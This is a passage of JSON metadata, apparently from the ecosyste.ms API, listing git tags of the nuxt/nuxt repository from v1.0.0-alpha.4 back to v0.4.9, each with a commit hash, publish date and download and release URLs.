0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ec